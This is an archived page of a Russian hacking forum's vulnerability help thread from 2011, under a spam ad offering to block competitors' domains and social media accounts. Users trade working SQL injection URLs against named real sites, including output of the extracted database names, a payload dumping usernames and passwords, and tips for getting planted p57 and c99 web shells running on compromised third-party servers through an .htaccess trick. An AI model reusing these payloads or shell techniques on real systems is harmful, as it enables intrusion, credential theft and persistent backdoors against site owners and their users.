УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1770 из 2438

1770

Опции темы

Поиск в этой теме

Опции просмотра

#17691

25.07.2011, 22:45

Cherep

Новичок

Регистрация: 30.05.2010

Сообщений: 10

Провел на форуме:
42585

Репутация: 0

Цитата:

Сообщение от попугай

попугай said:
в текстовом редакторе notepad++ есть встроенный плагин, чтоб base64 гонять туда-обратно.
Кроме того, сейчас попробовал скриптом base64_decode сделать - все прекрасно переводится. А белибирда - это бинарные данные собственно.
p.s Я просто не так тебя понял, я думал у тебя просто ошибка в декодинге была.

ладно пасиба, буду пробывать)

#17692

25.07.2011, 23:56

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Господа, помогите раскрутить эту скулю:

http://www.xakep.ru/local/include/voter_com.asp?action=add&filedir=2246941'&site=xak ep

#17693

26.07.2011, 00:20

fl00der

Постоянный

Регистрация: 17.12.2008

Сообщений: 353

Провел на форуме:
919131

Репутация: 74

Цитата:

Сообщение от Expl0ited

Expl0ited said:
Он использовал havij

А может кто-нидь реально рассказать, как самому сделать?

А то всякие хеведжи не интересуют.

#17694

26.07.2011, 00:50

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от Konqi

Konqi said:
немного модифицировал запрос
'and(1=0)union(select(1),2,3,4,(select(@x)from(sel ect(@x:=0x00),(select(0)from(users)where(1)in(@x:= concat(@x,0x3a,username,0x3a,password))))x),6)#

вбей в гугл хеш админа... боян этот сайт ..да и интересного ничего там нет ..только как спортивный интереc

#17695

26.07.2011, 00:59

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от FlaktW

FlaktW said:
Господа, помогите раскрутить эту скулю:
http://www.xakep.ru/local/include/voter_com.asp?action=add&filedir=2246941'&site=xak ep

Код:

Code:
http://www.xakep.ru/local/include/voter_com.asp?action=add&site=xakep&filedir=(2246941)and(substring((db_name()),1,1)='w')

Код:

Code:
master
tempdb
model
msdb
forum_integr
files
wbanner
wcounter
wvote
www
wrate
zbit_net_chat
catalogs
test
forum_gameland
forum_xakep

Дальше тянуть не стал.

#17696

26.07.2011, 08:48

freezed

Guest

Сообщений: n/a

Провел на форуме:
31258

Репутация: 7

Цитата:

Сообщение от fl00der

fl00der said:
А может кто-нидь реально рассказать, как самому сделать?
А то всякие хеведжи не интересуют.

http://www.candy.ru/detail.asp?PrId=690+and+1=0+union+all+select+null, null,null,null,null,null,null,null,null,table_name ,null,null,null+from+sys.user_tables

чем два дня ждать, пока кто-нибудь расскажет, хотя бы открыл мануал по ораклу и сам бы разбирался

/thread40576.html

#17697

26.07.2011, 11:14

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от Qwert321

Qwert321 said:
Помогите кто-нить... есть шелл залитый р57, но почему он не пашет?
http://matkarent.ee/wp-includes/images/crystal/list.png
всё перепробовал

а втойже папке где шелл, файлик есть ли такой .htaccess

в котором должно быть прописано

Цитата:

Сообщение от None

AddType application/x-httpd-php .png

без этого сервер будет твой png читать как картинку а не как скрипт.

#17698

26.07.2011, 11:17

lukmus

Постоянный

Регистрация: 18.11.2009

Сообщений: 709

Провел на форуме:
1410429

Репутация: 214

Цитата:

Сообщение от Qwert321

Qwert321 said:
Помогите кто-нить... есть шелл залитый р57, но почему он не пашет?
http://matkarent.ee/wp-includes/images/crystal/list.png
всё перепробовал
и черезз get заросы в строке не пашет...

на шелл есть права на чтение/выполнение?

какое расширение у шелла? исполнительные ли файлы с этим расширением в .htaccess?

шелл открывается как на скрине?

#17699

26.07.2011, 11:51

lukmus

Постоянный

Регистрация: 18.11.2009

Сообщений: 709

Провел на форуме:
1410429

Репутация: 214

Цитата:

Сообщение от Qwert321

Qwert321 said:
Это и есть сам шелл, в .htaccess добавлен тип .png
Там рядом лежат ещё blank.png тоше шелл, но забыл пароль... понакуре поставил.

залей нормальный шел https://rdot.org/forum/showthread.php?t=1085.

А если шелл с расширением .php заливать он работает?

#17700

26.07.2011, 22:18

Nolen88

Guest

Сообщений: n/a

Провел на форуме:
1250

Репутация: 0

Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php

вот кусок кода из шелла про авторизацию

$login = "2";

$pass = "2";

$md5_pass = "c81e728d9d4c2f636f067f89cc14862c";

не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.

Страница 1770 из 2438

1770

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход